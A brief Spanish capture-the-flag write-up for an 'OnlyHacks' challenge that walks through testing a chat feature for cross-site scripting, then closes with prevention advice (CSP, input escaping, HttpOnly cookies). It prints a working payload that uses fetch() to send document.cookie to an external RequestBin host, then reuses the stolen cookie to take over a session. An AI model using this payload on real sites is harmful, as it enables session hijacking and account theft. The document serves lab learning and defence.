OnlyHacks (XSS)

- Cross-Site Scripting (XSS) -

  • Creamos un usuario nuevo:

  • Al entrar hablamos con una joven para ver que dice:

  • Miramos si es vulnerable al XSS .

<script>alert("Hola, mundo!");</script>

  • Existe un servidor en internet gratis para hacer este tipo de pruebas:

RequestBin - 1benktc1

  • Nuestro comando:

<script>fetch("http://requestbin.whapi.cloud/1benktc1?cookie=" + document.cookie );</script>

  • Recuperamos la Cookie de sesión para entrar como en usuario:

  • En la página podemos ver la cookie para copiar y pegar en Apliction, por ultimo recargamos la página.

es un ataque de Cross-Site Scripting (XSS) diseñado para robar cookies de sesión y enviarlas a un servidor externo.

¿Por qué es peligroso?

  • Exfiltración de datos: Si un usuario carga una página vulnerable y este script se ejecuta, sus cookies se enviarán a la URL especificada.

  • Secuestro de sesiones: Si la cookie contiene credenciales de sesión, un atacante podría usarlas para acceder a la cuenta del usuario.

¿Cómo prevenirlo?

  1. Implementar Content Security Policy (CSP) para evitar la ejecución de scripts no autorizados.

  2. Escapar y sanitizar entradas de usuario para prevenir la inyección de scripts.

  3. Usar HttpOnly en las cookies para evitar que JavaScript acceda a ellas.

PreviousPage

Last updated